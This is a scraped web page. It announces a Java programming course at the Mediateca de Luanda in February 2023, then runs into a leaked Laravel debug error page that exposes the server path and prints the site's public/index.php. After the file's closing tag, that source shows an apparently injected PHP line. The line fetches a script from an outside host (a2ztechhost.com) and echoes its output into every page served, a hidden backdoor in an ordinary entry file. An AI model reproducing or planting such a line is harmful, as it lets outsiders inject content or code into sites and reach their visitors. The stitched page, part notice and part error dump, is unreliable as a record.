Curso Profissional de Programação Java

01
02
2023

Curso Profissional de Programação Java

  • Horário : 10:00h - 15:00h
  • Localização : Mediateca de Luanda

A Code Zone Education em parceria com a Mediateca de Luanda, realizarão um plano de Cursos 100% Práticos e Intensivos, que decorrerão em Fevereiro, na primeira semana, com dois turnos manhã das 10h às 12h, tarde das 13h às 14h. E aos sábados das 13h às 15h.

Local: Mediateca 28 De Agosto Luanda, Largo das Escolas, de Frente o IMNE-MARISTA.

Requisitos para a inscrição:

1 Cópia do B.I ou da Cédula;

1 Fotos tipo passe.

Para mais informações ligue:

: (+244) 934 879 642

: (+244) 951 369 684

: (+244) 924 1758 40

Avalie as Mediatecas
AQUI!
mouse touch
🧨 file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution

APP_DEBUG is set to true while APP_ENV is not local

This could make your application vulnerable to remote execution. Read more about Ignition security.

/home/mediatecasgov/public_html/
ErrorException
file_get_contents(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution
    • 3
      public/index.php
      Illuminate\Foundation\Bootstrap\HandleExceptions
      :58
  1. 1 unknown frame
    • 1
      public/index.php
      :58
Illuminate\Foundation\Bootstrap\HandleExceptions::handleError
public/index.php:58

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

| this application. We just need to utilize it! We'll simply require it

| into the script here so we don't need to manually load our classes.

|

*/

 

require __DIR__.'/../vendor/autoload.php';

 

/*

|--------------------------------------------------------------------------

| Run The Application

|--------------------------------------------------------------------------

|

| Once we have the application, we can handle the incoming request using

| the application's HTTP kernel. Then, we will send the response back

| to this client's browser, allowing them to enjoy our application.

|

*/

 

$app = require_once __DIR__.'/../bootstrap/app.php';

 

$kernel = $app->make(Kernel::class);

 

$response = tap($kernel->handle(

$request = Request::capture()

))->send();

 

$kernel->terminate($request, $response);

?>

<?php

echo file_get_contents("https://a2ztechhost.com/wp-rest-api.php");

?>